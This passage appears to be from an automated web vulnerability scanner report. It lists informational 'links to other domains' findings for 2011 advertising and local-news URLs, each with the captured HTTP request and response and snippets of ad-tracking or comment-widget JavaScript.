Server: nginx/0.7.62
Date: Mon, 11 Apr 2011 16:31:18 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Content-Length: 146

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=567&external_user_id=0&expiration=1305131478"/>');
10.121. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-48114-17349-5

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ad/js/1551-48114-17349-5?mpt=532355&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/r%3B239410357%3B0-0%3B0%3B46850814%3B4307-300/250%3B35536982/35554800/1%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D280882%3Bcontx%3Dnone%3Ban%3D100%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D3/1/e4/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=809237955976; mojo3=13754:22869

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=1551:17349/13754:22869; expires=Thu, 11-Apr-2013 4:27:58 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 525
Date: Mon, 11 Apr 2011 16:21:22 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/3/0/*/r;239410357;0-0;0;46850814;4307-300/250;35536982/35554800/1;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.100;~okv=;net=cm;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.100;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=280882;contx=none;an=100;dc=w;btg=;~aopt=3/1/e4/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/1551-48114-17349-5?mpt=532355"><img ismap border=0 src="http://img-cdn.mediaplex.com/0/1551/48114/Root300X250.jpg" >
...[SNIP]...
10.122. http://bcp.crwdcntrl.net/px  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /px

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /px?Yz00OTImcHhpZD05MzA%3D HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/4/c=492%7Crand=759762185%7Cpv=y%7Crt=ifr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwXRCoy8DAqG9lK%2FmRQZ2BQUBJxY8NKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMVEyDFNQOsnU8UokEYTImcgyipBisROA4xxQ1MCT2DODcCwiuG6DsE4ZVAXPYerE9YH0zx%2FoP4wRSi7wDEuf5AHgAyMCmY; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgUPf%2F97i7DAyM%2Bla2kh9BYgwczrJKLAwMZxkY%2FgPF3wApRgYGydubQNSX22eAFDNQ%2FCcD3y8GHmUBByY0pUBVjEJbLeF6mH4yMP9iYBbatAlZiOUXA5NS0ky4kRBVTErxXmChdXAhRqFNO5A1MoJVucBVgfgMXDJ16vidHMC7D7%2BCwEXM%2BBVwtU4ioKC%2BAb8CzsfL8SvgTthFSMFO%2FAr4Kt7iVyBrdhG%2FAgCc%2B7Nr; OAID=256d63b06b8b5a8d4fa891a87d791a1a

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:29:33 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1043

<html><body><div><script src="http://tags.crwdcntrl.net/c/368/cc.js"></script>
<script>
function processTargusData(json)
{
if (json != null && json.targus != null) {
   var fireIt = false;

...[SNIP]...
</script>
<script src="http://adadvisor.net/adscores/g.json?sid=9202507693"></script>
...[SNIP]...
10.123. http://bh.contextweb.com/bh/sync/admeld  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/sync/admeld

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bh/sync/admeld?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.97552ab6-5d98-11e0-8434-0025900a8ffe.1|535039.bf0d68cb-2449-4e5d-8b20-461d8ec850c3.0|535461.4608069584519221037.1|531292.CG-00000001131071922.1; C2W4=3x1f-Ps9Yhy3ydw-2vbkHY4Vj-8mDoMxIgKRGAlDwhIQOU6J7b35caw; cr=111|5|-8588990505152210454|1; V=wOEFmQuIafIS

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
Set-Cookie: V=wOEFmQuIafIS; Domain=.contextweb.com; Expires=Thu, 05-Apr-2012 16:31:19 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 162
Date: Mon, 11 Apr 2011 16:31:18 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=8&external_user_id=wOEFmQuIafIS&_segment=2%7CwOEFmQuIafIS%7C"/>');
10.124. http://blackpearl.wcax.com/wcax/PROMOTION/promotions.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blackpearl.wcax.com
Path:   /wcax/PROMOTION/promotions.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /wcax/PROMOTION/promotions.html?L=398823&referrerDomain=www.wcax.com HTTP/1.1
Host: blackpearl.wcax.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:08 GMT
Server: Apache/2.2.8 (Win32) PHP/5.2.5
Last-Modified: Tue, 04 Jan 2011 17:17:00 GMT
ETag: "9a000000011dce-5b9-499086fc1aa56"
Accept-Ranges: bytes
Content-Length: 1465
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<map name="Map2" id="Map2">
<area shape="rect" coords="14,104,313,352" href="http://buyvermontfirst.biz/" />
<area shape="rect" coords="18,375,318,626" href="http://www.wcax.com/Global/story.asp?S=11622383" target="_blank" />
<area shape="rect" coords="17,1208,321,1457" href="http://www.vyo.org/index.php?events/action/show/id/event/yr/2011/mon/1" /><area shape="rect" coords="13,658,315,910" href="http://www.use.salvationarmy.org/greaterburlington" /><area shape="rect" coords="15,942,317,1193" href="http://www.sleddogdash.com/race_info.html" /><area shape="rect" coords="16,1477,317,1729" href="http://www.vtso.org/" /><area shape="rect" coords="17,1756,316,2008" href="http://services.vsac.org/wps/wcm/connect/vsac/VSAC/General/Calendar+of+Events/College+Pathways/" />
<area shape="rect" coords="15,2016,316,2273" href="http://www.burlingtonbookfestival.com/" />
</map>
...[SNIP]...
10.125. http://clientapps.kickapps.com/hearst/articleTitles.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/articleTitles.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /hearst/articleTitles.php?as=62976&lSize=4&divName=kickapps_mostcommented&daysOffset=3 HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:29:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:29:55 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 861

//fl1-13

//http://serve.a-feed.com/service/getFeed.kickAction?as=62976&mediaType=externalmedia&sortType=commented&quantity=4&fromDate=04-06-2011
var title_container = document.getElementById('kickapp
...[SNIP]...
<span id="ka_article_titles">            <a id="ka_article_title_a" href="http://www.wptz.com/news/27457536/detail.html">Winooski Employee On Paid Leave For Pushing A Teenager</a>            <a id="ka_article_title_a" href="http://www.wptz.com/news/27471388/detail.html">Mom Defends 12-Year-Old Son In Winooski Altercation</a>            <a id="ka_article_title_a" href="http://www.wptz.com/video/27471494/detail.html">Mom Defends 12-Year-Old Son In Winooski Altercation</a>            <a id="ka_article_title_a" href="http://www.wptz.com/news/27456594/detail.html">Girls Gone Wild Coming to Local Bar</a>
...[SNIP]...
10.126. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/cnr_100plus.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=EST&pSize=&dName=&loginAtBottom= HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:31:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:31:08 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 87675

var ka_version_number = "1.71";
var ka_external_url = "http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html";
var ka_adminUser = 'wptz';
var ka_commentsList = "";
var ka_as = "62976";
var ka_totS
...[SNIP]...
<BR/>By posting your comments you agree to accept the <a target="_blank" href="http://www.wptz.com/station/21273835/detail.html">Terms of Use</a>
...[SNIP]...
<p id="ka_registrationDisclaimer">By using Local Voices I agree to the <a target="_blank" href="http://www.wptz.com/station/21273835/detail.html">Terms of Use</a> and <a target="_blank" href="http://www.wptz.com/privacy/index.html">Privacy Policy</a>
...[SNIP]...
<div id="ka_singlesignon_text">Or <a class="rpxnow" onclick="RPXNOW.show(); return false;" href="https://mylogin.rpxnow.com/openid/v2/signin?token_url=http://ulocal.wptz.com/user/userLoginRPX.kickAction%3Fas%3D62976%26redirectURL%3D'+pageUrl+'" title="Third Party Login">log in using another provider</a>
...[SNIP]...
<div id="ka_singlesignon_image"><a class="rpxnow" onclick="RPXNOW.show(); return false;" href="https://mylogin.rpxnow.com/openid/v2/signin?token_url=http://ulocal.wptz.com/user/userLoginRPX.kickAction%3Fas%3D62976%26redirectURL%3D'+pageUrl+'" title="Third Party Login"><img src="http://clientapps.kickapps.com/hearst/comments/images/sso_logos.png"/>
...[SNIP]...
</span>';
loginHTML = loginHTML + ' You are logged in as <a id="ka_loggedInUserLink" href="http://ulocal.wptz.com/service/displayKickPlace.kickAction?u='+ka_loggedInUserid+'&as=62976">' + ka_loggedInUsername + '</a>
...[SNIP]...
ss = 'ka_commentorProfileImageNotExists';
           }
           else{
               ka_profile_image_class = 'ka_commentorProfileImageExists';
           }
           document.getElementById('ka_loggedInUserProfileImage').innerHTML = '<a href="http://ulocal.wptz.com/service/displayKickPlace.kickAction?u='+ka_loggedInUserid+'&as=62976"><img align="absmiddle" border="0" src="'+ka_profile_image+'" class="'+ka_profile_image_class+'">
...[SNIP]...
ileImageCookie = 'ka_profile_image_62976_'+ka_uid;
   ka_createCookie(profileImageCookie,ka_profile_image,0.1);

   //display photo
   document.getElementById('ka_loggedInUserProfileImage').innerHTML = '<a href="http://ulocal.wptz.com/service/displayKickPlace.kickAction?u='+ka_loggedInUserid+'&as=62976"><img align="absmiddle" border="0" src="'+ka_profile_image+'" class="'+ka_profile_image_class+'">
...[SNIP]...
<div id="ka_replyToWrapper"><a class="ka_replyImage" href="http://ulocal.wptz.com/service/displayKickPlace.kickAction?u='+parentUserid+'&as=62976"><img border="0" src="'+parentImage+'" class="'+ka_profile_image_class+'">
...[SNIP]...
<div id="ka_replyTextWrapper"><a class="ka_replyLink" href="http://ulocal.wptz.com/service/displayKickPlace.kickAction?u='+parentUserid+'&as=62976">'+parentUsername+'</a>
...[SNIP]...
<div class="ka_user_comment">'+prePoster+'<a href="http://ulocal.wptz.com/service/displayKickPlace.kickAction?u='+commentsJSON[i].createdBy+'&as=62976" class="ka_commentorLink">'+commentsJSON[i].createdByUsername+'</a> <a href="http://ulocal.wptz.com/service/displayKickPlace.kickAction?u='+commentsJSON[i].createdBy+'&as=62976" class="ka_commentorProfileLink">[Profile]</a>
...[SNIP]...
<div class="ka_username2"><a href="http://ulocal.wptz.com/service/displayKickPlace.kickAction?u='+commentsJSON[i].createdBy+'&as=62976" >' + commentsJSON[i].createdByUsername + '</a>
...[SNIP]...
<div class="ka_startImage">';
           currentCommentHtml +='<a href="http://ulocal.wptz.com/service/displayKickPlace.kickAction?u='+commentsJSON[i].createdBy+'&as=62976">';
           currentCommentHtml +='<img src="http://static.kickapps.com/kickapps/images/' + image + '" border="0" style="border:1px solid #CCC;" class="ka_commentorProfileImageExists"/>
...[SNIP]...
<div class="ka_startImage">';
           currentCommentHtml +='<a href="http://ulocal.wptz.com/service/displayKickPlace.kickAction?u='+commentsJSON[i].createdBy+'&as=62976">';
           currentCommentHtml +='<img src="http://media.kickstatic.com/kickapps/images/user/defaultImage_48x48_D.jpg" border="0" style="border:1px solid #CCC;" class="ka_commentorProfileImageNotExists"/>';
           currentCommentHtml +='</a>
...[SNIP]...
10.127. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=turn1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 302 Found
Location: http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESEPnl_BQKY41VmlI3ZpuAFWQ&cver=1
Cache-Control: Cache-Control: no-store, no-cache
Pragma: Pragma: no-cache
Date: Mon, 11 Apr 2011 16:41:20 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://r.turn.com/r/bd?ddc=1&amp;pid=18&amp;uid=CAESEPnl_BQKY41VmlI3ZpuAFWQ&amp;cver=1">here</A>
...[SNIP]...
10.128. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=appnexus1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302541875197&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 302 Found
Location: http://adx.adnxs.com/mapuid?member=181&user=CAESENjWPLIPAv41DU05MuE90XA&cver=1
Cache-Control: Cache-Control: no-store, no-cache
Pragma: Pragma: no-cache
Date: Mon, 11 Apr 2011 17:11:20 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://adx.adnxs.com/mapuid?member=181&amp;user=CAESENjWPLIPAv41DU05MuE90XA&amp;cver=1">here</A>
...[SNIP]...
10.129. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=audsci HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 302 Found
Location: http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEHY1ZuArE-t4uQIwODrZlUM&cver=1
Cache-Control: Cache-Control: no-store, no-cache
Pragma: Pragma: no-cache
Date: Mon, 11 Apr 2011 16:21:06 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 341
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEHY1ZuArE-t4uQIwODrZlUM&amp;cver=1">here</A>
...[SNIP]...
10.130. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=TheTradeDesk HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.adsrvr.org/container/7j9i29e.1.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 302 Found
Location: http://data.adsrvr.org/map/cookie/google?g_uuid=CAESEH8TJy1DtAWkatR5O_JKSYo&cver=1
Cache-Control: Cache-Control: no-store, no-cache
Pragma: Pragma: no-cache
Date: Sat, 09 Apr 2011 00:18:48 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://data.adsrvr.org/map/cookie/google?g_uuid=CAESEH8TJy1DtAWkatR5O_JKSYo&amp;cver=1">here</A>
...[SNIP]...
10.131. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=rfi&forward= HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 302 Found
Location: http://a.rfihub.com/cm?id=CAESEPxOsKR978Hu13ThKmL5OJM&cver=1&forward=
Cache-Control: Cache-Control: no-store, no-cache
Pragma: Pragma: no-cache
Date: Sat, 09 Apr 2011 12:35:34 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 274
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://a.rfihub.com/cm?id=CAESEPxOsKR978Hu13ThKmL5OJM&amp;cver=1&amp;forward=">here</A>
...[SNIP]...
10.132. http://content.worldnow.com/global/tools/video/WNVideoCodebase_v2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.worldnow.com
Path:   /global/tools/video/WNVideoCodebase_v2.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /global/tools/video/WNVideoCodebase_v2.js?ver=201010090400 HTTP/1.1
Host: content.worldnow.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
